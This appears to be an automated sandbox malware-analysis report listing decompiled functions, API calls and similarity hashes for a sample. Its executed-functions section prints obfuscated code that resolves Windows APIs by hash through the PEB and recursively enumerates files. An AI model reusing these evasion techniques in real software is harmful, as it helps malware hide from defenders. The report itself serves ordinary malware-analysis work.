                                            				if(GetClassInfoA(_t46, _t50,  &_v44) == 0) {
                                            					_v44.style = _a4;
                                            					_v44.lpfnWndProc = DefWindowProcA;
                                            					_v44.cbWndExtra = 0;
                                            					_v44.cbClsExtra = 0;
                                            					_v44.lpszMenuName = 0;
                                            					_v44.hIcon = _a16;
                                            					_push( &_v44);
                                            					_v44.hInstance = _t46;
                                            					_v44.hCursor = _t40;
                                            					_v44.hbrBackground = _a12;
                                            					_v44.lpszClassName = _t50;
                                            					_t36 = E004142C3();
                                            					_t65 = _t36;
                                            					if(_t36 == 0) {
                                            						E0041A6C8(_t65);
                                            					}
                                            				}
                                            				return _t50;
                                            			}











                                            APIs
                                              • Part of subcall function 00425FC6: LeaveCriticalSection.KERNEL32(?,00425D5F,00000010,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700,0041843C), ref: 00425FDE
                                              • Part of subcall function 004067EC: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00406468,00000000), ref: 0040681A
                                            • wsprintfA.USER32 ref: 0041439A
                                            • wsprintfA.USER32 ref: 004143B6
                                            • GetClassInfoA.USER32 ref: 004143C5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: wsprintf$ClassCriticalExceptionInfoLeaveRaiseSection
                                            • String ID: Afx:%x:%x
                                            • API String ID: 2529146597-2071556601
                                            • Opcode ID: d77d54e2a205c26894113d0f98cb3835fbc2923fa6b7d860ecab1e58f07b156b
                                            • Instruction ID: 12ef8f29c3e1d770b63201246022492823754bba1a77f7a68e39ab1c72f0dc03
                                            • Opcode Fuzzy Hash: d77d54e2a205c26894113d0f98cb3835fbc2923fa6b7d860ecab1e58f07b156b
                                            • Instruction Fuzzy Hash: 99113370B002199FDB10EFA5D8819DF7BB8EF48354B54402BF914E3241E3789A918BA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E0040E0CD(intOrPtr __ecx) {
                                            				void* _t30;
                                            				void* _t33;
                                            
                                            				E00406520(E0042AD9C, _t30);
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				 *((intOrPtr*)(_t30 - 0x14)) = __ecx;
                                            				 *((intOrPtr*)(_t30 - 0x10)) = 0x42e428;
                                            				E0040F44C(__ecx, _t33, _t30 - 0x10);
                                            				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                            				 *((char*)(__ecx + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 8))));
                                            				E00401AE0(__ecx + 0xc, 0);
                                            				E00402320(__ecx + 0xc,  *((intOrPtr*)(_t30 + 8)), 0,  *0x42b7d8);
                                            				 *((intOrPtr*)(__ecx)) = 0x42f884;
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
                                            				return __ecx;
                                            			}






                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: (B$string too long
                                            • API String ID: 3519838083-213930478
                                            • Opcode ID: f03796f0994221b19e597dc6b348fa6f620dcfc84c8546b3792d48647d6ad245
                                            • Instruction ID: 0881663991a763b1776dc7e615562ac6718b0cdd44e68c2937c70cca8b3e00b0
                                            • Opcode Fuzzy Hash: f03796f0994221b19e597dc6b348fa6f620dcfc84c8546b3792d48647d6ad245
                                            • Instruction Fuzzy Hash: 37F0C272700255AFCB14DB45DC41BAEF7B8EB84344F40403FF501A7281C7B86908C7A9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E0040E516(intOrPtr __ecx, void* __eflags) {
                                            				void* _t30;
                                            
                                            				E00406520(E0042AE28, _t30);
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				 *((intOrPtr*)(_t30 - 0x14)) = __ecx;
                                            				 *((intOrPtr*)(_t30 - 0x10)) = 0x42e428;
                                            				E0040F44C(__ecx, __eflags, _t30 - 0x10);
                                            				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                            				 *((char*)(__ecx + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 8))));
                                            				E00401AE0(__ecx + 0xc, 0);
                                            				E00402320(__ecx + 0xc,  *((intOrPtr*)(_t30 + 8)), 0,  *0x42b7d8);
                                            				 *((intOrPtr*)(__ecx)) = 0x42f908;
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
                                            				return __ecx;
                                            			}





                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: (B$ios::failbit set
                                            • API String ID: 3519838083-3284000329
                                            • Opcode ID: 714bb1d5edfaf863b24652250af2c782f2a8feea1520e9748f6d812b5ca07bc2
                                            • Instruction ID: 4fe0a7923be2234898ba92f5c38d2ffc42e0a3632a550d53740f74c2571e9ed9
                                            • Opcode Fuzzy Hash: 714bb1d5edfaf863b24652250af2c782f2a8feea1520e9748f6d812b5ca07bc2
                                            • Instruction Fuzzy Hash: 51F06272701215AFD7149B55D841BAEBBB8EB85744F40443FF511B7281C7B8690887A9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 68%
                                            			E00404EAA(char _a4, signed int _a8) {
                                            				intOrPtr* _t18;
                                            
                                            				if(E00404DD2() == 0) {
                                            					if((_a8 & 0x00000003) != 0) {
                                            						L8:
                                            						return 0x12340042;
                                            					}
                                            					_t6 =  &_a4; // 0x404f63
                                            					_t18 =  *_t6;
                                            					if( *((intOrPtr*)(_t18 + 8)) <= 0 ||  *((intOrPtr*)(_t18 + 0xc)) <= 0 ||  *_t18 >= GetSystemMetrics(0) ||  *((intOrPtr*)(_t18 + 4)) >= GetSystemMetrics(1)) {
                                            						return 0;
                                            					} else {
                                            						goto L8;
                                            					}
                                            				}
                                            				return  *0x439610(_a4, _a8);
                                            			}





                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: MetricsSystem
                                            • String ID: cO@
                                            • API String ID: 4116985748-3035479601
                                            • Opcode ID: c9c4155c18cf154a998879a47653fee1527eb16e544136ed5b28fe4e123089dd
                                            • Instruction ID: ce698e49c9a3c3113b24397bbaff0b3bfb960c4a55519e17048666b9bd17cfe1
                                            • Opcode Fuzzy Hash: c9c4155c18cf154a998879a47653fee1527eb16e544136ed5b28fe4e123089dd
                                            • Instruction Fuzzy Hash: 6AF03071104352DBC7219A35D804527B7D0BBC4355F008C7EE795A65D1D738D882EBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 81%
                                            			E0040E073(void* __eflags) {
                                            				intOrPtr* _t42;
                                            				intOrPtr* _t52;
                                            				void* _t54;
                                            				signed int _t60;
                                            
                                            				E00406520(E0042AD88, _t54);
                                            				 *((char*)(_t54 - 0x20)) =  *((intOrPtr*)(_t54 - 0xd));
                                            				E00401AE0(_t54 - 0x20, 0);
                                            				E00401B90(_t54 - 0x20, "string too long", E00405A40("string too long"));
                                            				_t5 = _t54 - 4;
                                            				 *_t5 =  *(_t54 - 4) & 0x00000000;
                                            				_t60 =  *_t5;
                                            				_push(_t54 - 0x20);
                                            				_t42 = _t54 - 0x3c;
                                            				L1();
                                            				 *((intOrPtr*)(_t54 - 0x3c)) = 0x42f864;
                                            				E004067EC(_t54 - 0x3c, 0x4336b8);
                                            				_pop(_t51);
                                            				E00406520(E0042AD9C, _t54);
                                            				_push(_t42);
                                            				_push(_t42);
                                            				_t52 = _t42;
                                            				 *((intOrPtr*)(_t54 - 0x14)) = _t52;
                                            				 *((intOrPtr*)(_t54 - 0x10)) = 0x42e428;
                                            				E0040F44C(_t42, _t60, _t54 - 0x10);
                                            				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
                                            				 *((char*)(_t52 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8))));
                                            				E00401AE0(_t52 + 0xc, 0);
                                            				E00402320(_t52 + 0xc,  *((intOrPtr*)(_t54 + 8)), 0,  *0x42b7d8);
                                            				 *_t52 = 0x42f884;
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t54 - 0xc));
                                            				return _t52;
                                            			}








                                            APIs
                                            • __EH_prolog.LIBCMT ref: 0040E078
                                              • Part of subcall function 0040E0CD: __EH_prolog.LIBCMT ref: 0040E0D2
                                              • Part of subcall function 004067EC: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00406468,00000000), ref: 0040681A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: H_prolog$ExceptionRaise
                                            • String ID: ios::failbit set$string too long
                                            • API String ID: 2062786585-1331328489
                                            • Opcode ID: bbf4af397965b2b2160e068da4858f3148205e3645e3424e421b924f25707da3
                                            • Instruction ID: 323c5a97231c9e7e2180db571d543564ba768becdaa7b618deba2c25bb2dd9de
                                            • Opcode Fuzzy Hash: bbf4af397965b2b2160e068da4858f3148205e3645e3424e421b924f25707da3
                                            • Instruction Fuzzy Hash: 68F03A62D111286ACB04F6E6EC42AEEBB7CAF08345F40407AF411B6092DB785608CBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 60%
                                            			E00425BA0(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
                                            				signed int _v8;
                                            				void* _t29;
                                            				intOrPtr _t32;
                                            				long* _t37;
                                            				intOrPtr* _t42;
                                            				signed int _t45;
                                            				struct _CRITICAL_SECTION* _t46;
                                            				intOrPtr* _t49;
                                            
                                            				_push(__ecx);
                                            				_t49 = _a4;
                                            				_t37 = __ecx;
                                            				_t45 = 1;
                                            				_v8 = _t45;
                                            				if( *((intOrPtr*)(_t49 + 8)) <= _t45) {
                                            					L10:
                                            					_t46 =  &(_t37[7]);
                                            					EnterCriticalSection(_t46);
                                            					E0042581A( &(_t37[5]), _t49);
                                            					LeaveCriticalSection(_t46);
                                            					LocalFree( *(_t49 + 0xc));
                                            					if(_t49 != 0) {
                                            						 *((intOrPtr*)( *_t49))(1);
                                            					}
                                            					_t29 = TlsSetValue( *_t37, 0);
                                            					L13:
                                            					return _t29;
                                            				} else {
                                            					goto L1;
                                            				}
                                            				do {
                                            					L1:
                                            					_t32 = _a8;
                                            					if(_t32 == 0 ||  *((intOrPtr*)(_t37[4] + 4 + _t45 * 8)) == _t32) {
                                            						_t42 =  *((intOrPtr*)( *(_t49 + 0xc) + _t45 * 4));
                                            						if(_t42 != 0) {
                                            							 *((intOrPtr*)( *_t42))(1);
                                            						}
                                            						_t29 =  *(_t49 + 0xc);
                                            						 *(_t29 + _t45 * 4) =  *(_t29 + _t45 * 4) & 0x00000000;
                                            					} else {
                                            						_t29 =  *(_t49 + 0xc);
                                            						if( *(_t29 + _t45 * 4) != 0) {
                                            							_v8 = _v8 & 0x00000000;
                                            						}
                                            					}
                                            					_t45 = _t45 + 1;
                                            				} while (_t45 <  *((intOrPtr*)(_t49 + 8)));
                                            				if(_v8 == 0) {
                                            					goto L13;
                                            				}
                                            				goto L10;
                                            			}












                                            APIs
                                            • EnterCriticalSection.KERNEL32(?), ref: 00425BFD
                                            • LeaveCriticalSection.KERNEL32(?,?), ref: 00425C0D
                                            • LocalFree.KERNEL32(?), ref: 00425C16
                                            • TlsSetValue.KERNEL32(?,00000000), ref: 00425C2C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                            • String ID:
                                            • API String ID: 2949335588-0
                                            • Opcode ID: cf5b2c567d48c01c7a453ca9de575100b85300225b99a98f7f9799342d216000
                                            • Instruction ID: 2aca870bf4ceec97ac406f80c089e65d4ca4c841141b20e4fc51915e0dfd648f
                                            • Opcode Fuzzy Hash: cf5b2c567d48c01c7a453ca9de575100b85300225b99a98f7f9799342d216000
                                            • Instruction Fuzzy Hash: BA21AC31305724EFC7249F45E888B6A7BA4FF40712F9080AEE5428B2A1D7B8F841CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00425F56(signed int _a4) {
                                            				void* _t14;
                                            				struct _CRITICAL_SECTION* _t16;
                                            				signed int _t22;
                                            				intOrPtr* _t25;
                                            				intOrPtr _t30;
                                            				intOrPtr _t31;
                                            
                                            				_t30 =  *0x439bdc; // 0x1
                                            				if(_t30 == 0) {
                                            					_t14 = E00425EC3();
                                            				}
                                            				_t31 =  *0x439bd8; // 0x0
                                            				if(_t31 == 0) {
                                            					_t22 = _a4;
                                            					_t25 = 0x4399e0 + _t22 * 4;
                                            					if( *((intOrPtr*)(0x4399e0 + _t22 * 4)) == 0) {
                                            						EnterCriticalSection(0x439a28);
                                            						if( *_t25 == 0) {
                                            							InitializeCriticalSection(0x439a40 + (_t22 + _t22 * 2) * 8);
                                            							 *_t25 =  *_t25 + 1;
                                            						}
                                            						LeaveCriticalSection(0x439a28);
                                            					}
                                            					_t16 = 0x439a40 + (_t22 + _t22 * 2) * 8;
                                            					EnterCriticalSection(_t16);
                                            					return _t16;
                                            				}
                                            				return _t14;
                                            			}










                                            APIs
                                            • EnterCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425F91
                                            • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FA3
                                            • LeaveCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FAC
                                            • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700), ref: 00425FBE
                                              • Part of subcall function 00425EC3: GetVersion.KERNEL32(?,00425F66,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700,0041843C), ref: 00425ED6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: CriticalSection$Enter$InitializeLeaveVersion
                                            • String ID:
                                            • API String ID: 1193629340-0
                                            • Opcode ID: 8ad6497125d2c86d00cbfb5de7a409f9b0d7499c984595d8118e55b052ad55c4
                                            • Instruction ID: b3ac33658b3b741abd4bb59a3792cd3dace0394c803b1a2d8ae3ffca9e92013f
                                            • Opcode Fuzzy Hash: 8ad6497125d2c86d00cbfb5de7a409f9b0d7499c984595d8118e55b052ad55c4
                                            • Instruction Fuzzy Hash: 00F0497160472ADFCB20EF64FC84997B3ACFB18316B81203BE64582161D774B956DBAC
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004079AB(void* __eax) {
                                            				void* _t1;
                                            
                                            				_t1 = __eax;
                                            				InitializeCriticalSection( *0x436f2c);
                                            				InitializeCriticalSection( *0x436f1c);
                                            				InitializeCriticalSection( *0x436f0c);
                                            				InitializeCriticalSection( *0x436eec);
                                            				return _t1;
                                            			}





                                            APIs
                                            • InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079B8
                                            • InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079C0
                                            • InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079C8
                                            • InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079D0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: CriticalInitializeSection
                                            • String ID:
                                            • API String ID: 32694325-0
                                            • Opcode ID: 51e235add1c7942b8d8dfe3c36194d8a20d458bafa86fc8f5d4db9dc8472a5e3
                                            • Instruction ID: 7b146446db7a68f273d69e9c37099d6d57513ee84f4d93e1aa445e082747f6c1
                                            • Opcode Fuzzy Hash: 51e235add1c7942b8d8dfe3c36194d8a20d458bafa86fc8f5d4db9dc8472a5e3
                                            • Instruction Fuzzy Hash: 67C00235905135FADF516B75FC058493F25EB063A0312E172E5145103487631C15EFD8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Execution Graph

                                            Execution Coverage:3.2%
                                            Dynamic/Decrypted Code Coverage:55.7%
                                            Signature Coverage:1.7%
                                            Total number of Nodes:652
                                            Total number of Limit Nodes:79

                                            Graph

33932->33923 33933->33925 33934 22730d0 33942 22730ea 33934->33942 33935 22732b5 33940 22731df 33935->33940 33944 2273f20 GetPEB 33935->33944 33937 2273f20 GetPEB 33937->33942 33938 22732c9 33945 2273e80 GetPEB 33938->33945 33941 227317a RtlAllocateHeap 33941->33940 33941->33942 33942->33935 33942->33937 33942->33940 33942->33941 33943 2273e80 GetPEB 33942->33943 33943->33942 33944->33938 33945->33940

                                            Executed Functions

                                            Control-flow Graph

                                            APIs
                                            • LoadLibraryW.KERNEL32(02244054,02244040), ref: 02241047
                                            • GetProcAddress.KERNEL32(00000000), ref: 0224104E
                                              • Part of subcall function 02241B30: SetLastError.KERNEL32(0000000D,?,02241070,?,00000040), ref: 02241B3D
                                            • SetLastError.KERNEL32(000000C1), ref: 02241096
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931652161.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2241000_sort.jbxd
                                            Similarity
                                            • API ID: ErrorLast$AddressLibraryLoadProc
                                            • String ID:
                                            • API String ID: 1866314245-0
                                            • Opcode ID: 13a4e2be3492ecaeddccffed2350f6adae253cab09d42a21b5ff9c6403bcd1c7
                                            • Instruction ID: 07ef2cb1e3596bf1eeb5e36629daaece6eaeef176d10aab42109e3e8f25f29be
                                            • Opcode Fuzzy Hash: 13a4e2be3492ecaeddccffed2350f6adae253cab09d42a21b5ff9c6403bcd1c7
                                            • Instruction Fuzzy Hash: E2F1CAB4E10209EFDB08CFD4D984BADB7B1BF48304F208598E919AB355DB75EA91CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            C-Code - Quality: 73%
                                            			E022738F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                            				char _v524;
                                            				short _v1044;
                                            				short _v1588;
                                            				intOrPtr _v1590;
                                            				struct _WIN32_FIND_DATAW _v1636;
                                            				void* _v1640;
                                            				intOrPtr _v1652;
                                            				void* __ebx;
                                            				void* __ebp;
                                            				void* _t22;
                                            				signed int _t24;
                                            				intOrPtr* _t28;
                                            				intOrPtr _t33;
                                            				void* _t35;
                                            				intOrPtr* _t39;
                                            				intOrPtr* _t41;
                                            				intOrPtr* _t43;
                                            				signed int _t49;
                                            				int _t55;
                                            				void* _t58;
                                            				void* _t93;
                                            				void* _t94;
                                            				void* _t95;
                                            				void* _t96;
                                            				void* _t97;
                                            				void* _t98;
                                            				void* _t100;
                                            
                                            				_t93 = __ecx;
                                            				_t97 = __edx;
                                            				_v1640 = __ecx;
                                            				_t22 = 0x1b0f738d;
                                            				_t58 = _v1640;
                                            				goto L1;
                                            				do {
                                            					while(1) {
                                            						L1:
                                            						_t100 = _t22 - 0xd5d5438;
                                            						if(_t100 <= 0) {
                                            							break;
                                            						}
                                            						if(_t22 == 0x1b0f738d) {
                                            							_t22 = 0x1c39f1c;
                                            							continue;
                                            						} else {
                                            							if(_t22 != 0x3aa0d798) {
                                            								goto L6;
                                            							} else {
                                            								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
                                            									_t24 = _a4( &_v1636, _a8);
                                            									asm("sbb eax, eax");
                                            									_t22 = ( ~_t24 & 0xffb9c0ef) + 0x651b5f5;
                                            								} else {
                                            									if(_v1636.cFileName != 0x2e) {
                                            										L30:
                                            										if(_t97 == 0) {
                                            											goto L29;
                                            										} else {
                                            											_t96 = E022734C0(0x227d260);
                                            											_t28 =  *0x227dc60;
                                            											if(_t28 == 0) {
                                            												_t28 = E02273E80(_t58, E02273F20(0xe66945e6), 0xcca28b0d, _t97);
                                            												 *0x227dc60 = _t28;
                                            											}
                                            											 *_t28( &_v524, 0x104, _t96, _t93,  &(_v1636.cFileName));
                                            											E022738F0( &_v524, _t97, _a4, _a8);
                                            											_t98 = _t98 + 0x1c;
                                            											E02273460(_t96);
                                            											_t22 = 0x60b76e4;
                                            										}
                                            									} else {
                                            										_t33 = _v1590;
                                            										if(_t33 == 0 || _t33 == 0x2e && _v1588 == 0) {
                                            											L29:
                                            											_t22 = 0x60b76e4;
                                            										} else {
                                            											goto L30;
                                            										}
                                            									}
                                            								}
                                            								continue;
                                            							}
                                            						}
                                            						L40:
                                            					}
                                            					if(_t100 == 0) {
                                            						if( *0x227e004 == 0) {
                                            							 *0x227e004 = E02273E80(_t58, E02273F20(0xbb398380), 0xf53ce71f, _t97);
                                            						}
                                            						_t35 = FindFirstFileW( &_v1044,  &_v1636); // executed
                                            						_t58 = _t35;
                                            						if(_t58 == 0xffffffff) {
                                            							return _t35;
                                            						} else {
                                            							_t22 = 0x3aa0d798;
                                            							goto L1;
                                            						}
                                            					} else {
                                            						if(_t22 == 0x1c39f1c) {
                                            							_t95 = E022734C0(0x227d240);
                                            							_t39 =  *0x227dc60;
                                            							if(_t39 == 0) {
                                            								_t39 = E02273E80(_t58, E02273F20(0xe66945e6), 0xcca28b0d, _t97);
                                            								 *0x227dc60 = _t39;
                                            							}
                                            							 *_t39( &_v1044, 0x104, _t95, _t93);
                                            							_t41 =  *0x227dea8;
                                            							_t98 = _t98 + 0x10;
                                            							if(_t41 == 0) {
                                            								_t41 = E02273E80(_t58, E02273F20(0xbb398380), 0x97f883e, _t97);
                                            								 *0x227dea8 = _t41;
                                            							}
                                            							_t94 =  *_t41();
                                            							_t43 =  *0x227e1a0;
                                            							if(_t43 == 0) {
                                            								_t43 = E02273E80(_t58, E02273F20(0xbb398380), 0x26c3f343, _t97);
                                            								 *0x227e1a0 = _t43;
                                            							}
                                            							 *_t43(_t94, 0, _t95);
                                            							_t93 = _v1652;
                                            							_t22 = 0xd5d5438;
                                            							goto L1;
                                            						} else {
                                            							if(_t22 == 0x60b76e4) {
                                            								if( *0x227dfd4 == 0) {
                                            									 *0x227dfd4 = E02273E80(_t58, E02273F20(0xbb398380), 0xd3e90d14, _t97);
                                            								}
                                            								_t49 = FindNextFileW(_t58,  &_v1636); // executed
                                            								asm("sbb eax, eax");
                                            								_t22 = ( ~_t49 & 0x344f21a3) + 0x651b5f5;
                                            								goto L1;
                                            							} else {
                                            								if(_t22 == 0x651b5f5) {
                                            									if( *0x227e064 == 0) {
                                            										 *0x227e064 = E02273E80(_t58, E02273F20(0xbb398380), 0xa4a77084, _t97);
                                            									}
                                            									_t55 = FindClose(_t58); // executed
                                            									return _t55;
                                            								}
                                            								goto L6;
                                            							}
                                            						}
                                            					}
                                            					goto L40;
                                            					L6:
                                            				} while (_t22 != 0x36605fc2);
                                            				return _t22;
                                            				goto L40;
                                            			}































                                            APIs
                                            • FindNextFileW.KERNELBASE(?,?,00000000,0227998D,16BF64F2,00000001), ref: 02273976
                                            • FindFirstFileW.KERNELBASE(?,?,00000000,0227998D,16BF64F2,00000001), ref: 02273A5D
                                            • FindClose.KERNELBASE(?,00000000,0227998D,16BF64F2,00000001), ref: 02273B91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNext
                                            • String ID: .$8T]$8T]$Ei$Ei
                                            • API String ID: 3541575487-3972632629
                                            • Opcode ID: b020deec91cd406005055199104348e4e3b061d172992cba089a27be23da63c3
                                            • Instruction ID: 6369950f7e6e7ad1c15a0a2e300b6194211ded47f51dc50811043e109c094a14
                                            • Opcode Fuzzy Hash: b020deec91cd406005055199104348e4e3b061d172992cba089a27be23da63c3
                                            • Instruction Fuzzy Hash: 7951D775B2C30297D734EAF4A8456BF36D6ABC0244F10099DE946D7248EF75C805A7E3
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            C-Code - Quality: 84%
                                            			E02274CB0(intOrPtr* __ecx, void* __edx) {
                                            				void* _v556;
                                            				void* _v560;
                                            				void* __ebx;
                                            				void* _t5;
                                            				signed int _t7;
                                            				int _t13;
                                            				signed int _t17;
                                            				void* _t24;
                                            				intOrPtr* _t27;
                                            				void* _t43;
                                            				void* _t44;
                                            				void* _t45;
